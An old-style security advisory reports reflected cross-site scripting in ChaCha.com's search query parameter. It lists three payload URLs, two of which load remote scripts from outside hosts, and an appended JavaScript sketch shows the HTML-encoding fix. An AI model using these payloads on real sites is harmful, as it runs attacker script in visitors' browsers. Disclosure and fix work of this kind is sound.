The ChaCha.com search functionality suffers from a cross-site scripting vulnerability.
96ff97ef2ffceb4d5d77a8122900f48e3a0907da45e93270552d8ed9ba0b8af1
[+] ChaCha.com Search ?query= Cross-Site Scripting Vulnerability
[+] Author: d3hydr8
[+] Contact: d3hydr8[at]gmail[dot]com
[+] Original Post:
http://darkcode.h1x.com/forum/index.php?action=vthread&forum=12&topic=275
[+] Vendor Site: http://www.chacha.com/
[+] Class: Input Validation Error
[+] Overview: The first search engine that uses the brainpower of really smart people to find anything you want on the Internet. Here's how you use it
[+] Example:
1. http://search.chacha.com/search/query?query=%3CSCRIPT%20SRC=http://darkcode.h1x.com/xss.js%3E%3C/SCRIPT%3E
2. http://search.chacha.com/search/query?query=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E
3. http://search.chacha.com/search/query?query=<SCRIPT>alert("XSS");//<</SCRIPT>
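[+] Added example (not part of the original advisory, and not ChaCha's code): a sketch of the fix for this class of bug, showing the `query` value reflected verbatim next to the same value HTML-encoded at output time. The renderer functions, the page markup and the `example.invalid` hosts are assumptions made for illustration; only the `/search/query?query=` shape and the payload patterns come from the examples above.

```javascript
// Characters that must be encoded in HTML text and quoted attribute values.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Pull the decoded query parameter out of a request URL, as a server framework would.
function queryFromUrl(url) {
  return new URL(url).searchParams.get('query') ?? '';
}

// "Before" (hypothetical): the search term is reflected into the page unchanged.
function renderResultsUnsafe(query) {
  return `<h1>Results for ${query}</h1>`;
}

// "After": encode at the point of output, for the HTML text context.
function renderResultsSafe(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Search pages usually echo the term back into the search box too (attribute context).
function renderSearchBoxSafe(query) {
  return `<input name="query" value="${escapeHtml(query)}">`;
}

// Regression check: does the rendered HTML contain a live script element?
function hasScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample requests following the advisory's two payload patterns.
const SAMPLE_URLS = [
  'http://search.example.invalid/search/query?query=%3CSCRIPT%20SRC=http://example.invalid/xss.js%3E%3C/SCRIPT%3E',
  'http://search.example.invalid/search/query?query=<SCRIPT>alert("XSS");//<</SCRIPT>',
];

// Render every sample both ways and report whether a script element survives.
function auditSamples() {
  return SAMPLE_URLS.map((url) => {
    const query = queryFromUrl(url);
    return {
      query,
      unsafeHasScript: hasScriptTag(renderResultsUnsafe(query)),
      safeHasScript: hasScriptTag(renderResultsSafe(query)),
    };
  });
}

console.log(auditSamples());
```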